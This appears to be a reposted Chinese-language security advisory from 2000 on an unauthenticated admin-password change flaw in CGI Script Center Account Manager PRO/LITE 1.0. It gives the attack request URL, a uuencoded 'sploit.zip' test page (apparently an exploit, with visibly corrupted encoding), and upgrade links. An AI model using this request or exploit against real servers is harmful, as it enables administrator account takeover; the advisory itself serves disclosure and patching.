CGI Script Center帐号管理器管理员口令更改漏洞

2008-04-09 04:32:30来源：互联网阅读 ()

CGI Script Center帐号管理器管理员口令更改漏洞

发布日期：2000-08-24
更新日期：2000-08-24

受影响系统：

CGI Script Center Account Manager PRO 1.0
CGI Script Center Account Manager LITE 1.0
- Sun SunOS 4.1.4
- Sun Solaris 8.0
- RedHat Linux 6.2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000

描述：

无论远程用户拥有什么级别的权限，都可以更改CGI Script Centers' Account Manager
的管理员口令，他只需要以POST方式提交一个URL请求：
http://target/cgibin/amadmin.pl?setpasswd

<* 来源：n30 (n30@alldas.de) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

n30提供了一个测试页面：

begin 666 sploit.zip
M4$L#!!0``@`(`(IS%RG=)HE/E (``-P&``` ````17AP;&]I="YH=&VM5=]O
MVC 0?D?B?SB\UP;3;GNIDFBA"242D"@Q0]V;F[Cj*CQ&W:_?6[$'X,-E2J
M#BG@'.>[[^X[?S9'030%YX;YP<PB2ZU7UY36==U/1:*:IY^HG":/TKB7!>5)
MHG..OSE/<UGT5QF!J<?&@6N1,(@9L<T;;\:\R#:'D=WMF,P93CP8!I'K1189
M$%CX AM;Y,O7`?JR8>#>X99@XGJC> NP3;JS1,$"OQG&8VZW@^:8.1&SR"7N
M#C&);8Z"&8.1<^-9Y?2_X!?!2\NP"EB)[%EHFG 1NZP`!XO@T&@WP0VPG
M2=13H6&*VQY%"1.?>32,`I,V_O8U0,BKJE9E"M[ *E-2]S9_F11ST["I<5OQ
M.Y <XR@^#X[B8@_:L)@@W,2._1\8V[@D;V<),\$K`: 06-6K>BIAM2U$US(1
M?8"@2 1H!970(#4&*5)0&UNBB@=9YFCO[W =U'K,ZVDN3W/:[32L@C/Q;W'T
M(O]VS @<4NS/PCD#=A=BM:$3QPM,2&#F3/%]5:?H09E[/!M7Y !?5V?T:]N=
M7;5-6,K:&8X^BO/J_P'=,,.U5,7;8%NZCM'BT6P1=SLMY'@^G/IL"Q@'HNDM
M?'<F<WP%B'%"=N<`]K7 82E-V!T4D[8TT\U<T/7$[,?Z<)*ZG7](Q.#C$C&.
M-KV])']B.Z=)K6"\@QD4HU-R`DZCEFT/Q5Y D*[U:7?LOYA\LWUG>QX)U 8=
M9]734 I,P1RE9*I2^? *,6H):@0:0R6Q5!2 _66 ^@'8P5L/1UJ4&!O60]$\
M'):E> !(SF6FU34*WC>>92FO\*(A=F,U<F%2?@"<-I<3 G#9,PR(E^I)_VI2
MZE >(^87455KW<)04"\5_"Q4#;GH@6'@MM]02P$"% `4``(`" "*<Q<IW2:)
M3Y0"``#<!@``"P`````````!`" `MH$`````17AP;&]I="YH=&U02P4&````
/``$``0`Y````O0(`````
`
end

建议：

CGI Script Center 发布了升级版：

Account Manager LITE
http://www.cgiscriptcenter.com/acctlite/

Account Manager PRO
http://www.cgiscriptcenter.com/acctman/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有